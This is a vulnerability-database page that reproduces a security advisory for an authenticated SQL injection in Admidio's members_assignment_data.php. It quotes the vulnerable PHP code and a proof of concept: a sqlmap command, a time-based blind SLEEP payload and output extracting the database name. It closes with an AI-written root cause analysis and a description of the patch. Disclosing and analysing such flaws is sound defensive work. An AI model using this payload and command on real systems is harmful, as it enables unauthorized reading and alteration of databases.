7.2

CVSS Score

3.1

Basic Information

CVE ID

GHSA ID

GHSA-2v5m-cq9w-fc33

EPSS Score

CWE

CWE-89

Published

10/22/2025

Updated

10/22/2025

KEV Status

Technology

PHP

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-2v5m-cq9w-fc33

GHSA-2v5m-cq9w-fc33: Admidio Vulnerable to Authenticated SQL Injection in Member Assignment Functionality

Summary

An authenticated SQL injection vulnerability exists in the member assignment data retrieval functionality of Admidio. Any authenticated user with permissions to assign members to a role (such as an administrator) can exploit this vulnerability to execute arbitrary SQL commands. This can lead to a full compromise of the application's database, including reading, modifying, or deleting all data. The vulnerability is present in the latest version, 4.3.16.

Details

The vulnerability is located in the adm_program/modules/groups-roles/members_assignment_data.php script. This script handles an AJAX request to fetch a list of users for role assignment. The filter_rol_uuid GET parameter is not properly sanitized before being used in a raw SQL query.

File: adm_program/modules/groups-roles/members_assignment_data.php

// ... 
// The parameter is retrieved from the GET request without sufficient sanitization for SQL context.
$getFilterRoleUuid = admFuncVariableIsValid($_GET, 'filter_rol_uuid', 'string');
$getMembersShowAll = admFuncVariableIsValid($_GET, 'mem_show_all', 'bool', array('defaultValue' => false));

// ... 
$filterRoleCondition = '';
if ($getMembersShowAll) {
    $getFilterRoleUuid = 0;
} else {
    // show only members of current organization
    if ($getFilterRoleUuid !== '') {
        // VULNERABLE CODE: $getFilterRoleUuid is directly concatenated into the query string.
        $filterRoleCondition = ' AND rol_uuid = \''.$getFilterRoleUuid . '\'';
    }
}

// ...
// The vulnerable $filterRoleCondition is then used inside a subselect.
$sqlSubSelect = '(SELECT COUNT(*) AS count_this
                    FROM '.TBL_MEMBERS.'
              INNER JOIN '.TBL_ROLES.'
                      ON rol_id = mem_rol_id
              INNER JOIN '.TBL_CATEGORIES.'
                      ON cat_id = rol_cat_id
                   WHERE mem_usr_id  = usr_id
                     AND mem_begin  <= \''.DATE_NOW.'\'
                     AND mem_end     > \''.DATE_NOW.'\'
                         '.$filterRoleCondition.'
                     AND rol_valid = true
                     AND cat_name_intern <> \'EVENTS\'
                     AND cat_org_id = '.$gCurrentOrgId.')';
// ...

As shown above, the value of $getFilterRoleUuid is directly concatenated into the $filterRoleCondition variable, which is then embedded within a larger SQL query ($sqlSubSelect). This allows an attacker to break out of the string literal and inject arbitrary SQL commands.

PoC (Proof of Concept)

Prerequisites:

A running instance of Admidio (tested on version 4.3.16).
An authenticated user session with permissions to assign members to a role (e.g., the default 'admin' user).

Execution: The vulnerability can be triggered by manipulating the filter_rol_uuid parameter in the request to /adm_program/modules/groups-roles/members_assignment_data.php. Due to the large number of parameters, the easiest way to reproduce this is by capturing a legitimate request and replaying it with sqlmap.

Log in to Admidio as an administrator.
Navigate to Groups / Roles.
Click the "Assign members" icon for any existing role.
Using a web proxy like Burp Suite, intercept the GET request made to /adm_program/modules/groups-roles/members_assignment_data.php.
Save the entire raw request to a text file (e.g., admidio_request.txt).
Run the following sqlmap command to confirm the time-based blind SQL injection:

sqlmap -r /path/to/admidio_request.txt -p filter_rol_uuid --technique=T --dbms=mysql --current-db

Result: sqlmap will successfully identify and exploit the time-based blind SQL injection vulnerability.

---
Parameter: filter_rol_uuid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: role_uuid=...&filter_rol_uuid=' AND (SELECT 3332 FROM (SELECT(SLEEP(5)))vqnl) AND 'ENdG'='ENdG&...
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching current database
[INFO] retrieved: admidio
current database: 'admidio'

This confirms that an attacker can execute arbitrary SQL queries and extract information from the database.

(GitHub Advisory)

7.2

CVSS Score

3.1

Basic Information

CVE ID

GHSA ID

GHSA-2v5m-cq9w-fc33

EPSS Score

CWE

CWE-89

Published

10/22/2025

Updated

10/22/2025

KEV Status

Technology

PHP

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
admidio/admidio	composer	<= 4.3.16	4.3.17

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The security vulnerability is a classic SQL injection found in the Admidio application. The root cause is the direct concatenation of user-supplied input into an SQL query without proper sanitization. The analysis of the provided information, including the vulnerability description and the commit patch, points to a single file, adm_program/modules/groups-roles/members_assignment_data.php, as the source of the vulnerability.

The provided patch from commit fde81ae869e88a3cf42201f2548d57df785a37cb clearly shows the fix. The filter_rol_uuid GET parameter, which was previously read directly into the $getFilterRoleUuid variable using admFuncVariableIsValid, is now sanitized using StringUtils::strValidCharacters. This prevents special characters from being used to break out of the SQL string and inject arbitrary commands.

The vulnerable code is not encapsulated within a specific function but resides in the main body of the PHP script. When this script is requested by the web server, the code is executed sequentially. Therefore, the entire script members_assignment_data.php is the vulnerable component. In a runtime profile, this would appear as the main execution block for the request to this endpoint. For this reason, the script's filename is identified as the 'vulnerable function' as it represents the entry point and execution context of the vulnerable code.

Vulnerable functions

members_assignment_data.php

adm_program/modules/groups-roles/members_assignment_data.php

The vulnerability exists in the PHP script `members_assignment_data.php`, which is executed directly to handle an AJAX request. The script retrieves the `filter_rol_uuid` parameter from the GET request and uses it to construct an SQL query without proper sanitization. The vulnerable code is not within a specific function but in the global scope of the script. An attacker can inject malicious SQL code into the `filter_rol_uuid` parameter, which is then executed by the database. The patch applies the `StringUtils::strValidCharacters` function to sanitize this parameter, thus mitigating the SQL injection vulnerability. A profiler would show execution time within this script file during an exploit.

WAF Protection Rules

WAF Rule

### Summ*ry *n *ut**nti**t** SQL inj**tion vuln*r**ility *xists in t** m*m**r *ssi*nm*nt **t* r*tri*v*l *un*tion*lity o* **mi*io. *ny *ut**nti**t** us*r wit* p*rmissions to *ssi*n m*m**rs to * rol* (su** *s *n **ministr*tor) **n *xploit t*is vuln*r*

Reasoning

T** s**urity vuln*r**ility is * *l*ssi* SQL inj**tion *oun* in t** **mi*io *ppli**tion. T** root **us* is t** *ir**t *on**t*n*tion o* us*r-suppli** input into *n SQL qu*ry wit*out prop*r s*nitiz*tion. T** *n*lysis o* t** provi*** in*orm*tion, in*lu*i

7.2

Basic Information

Concerned about an active attack path?

GHSA-2v5m-cq9w-fc33: Admidio Vulnerable to Authenticated SQL Injection in Member Assignment Functionality

Summary

Details

PoC (Proof of Concept)

7.2

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI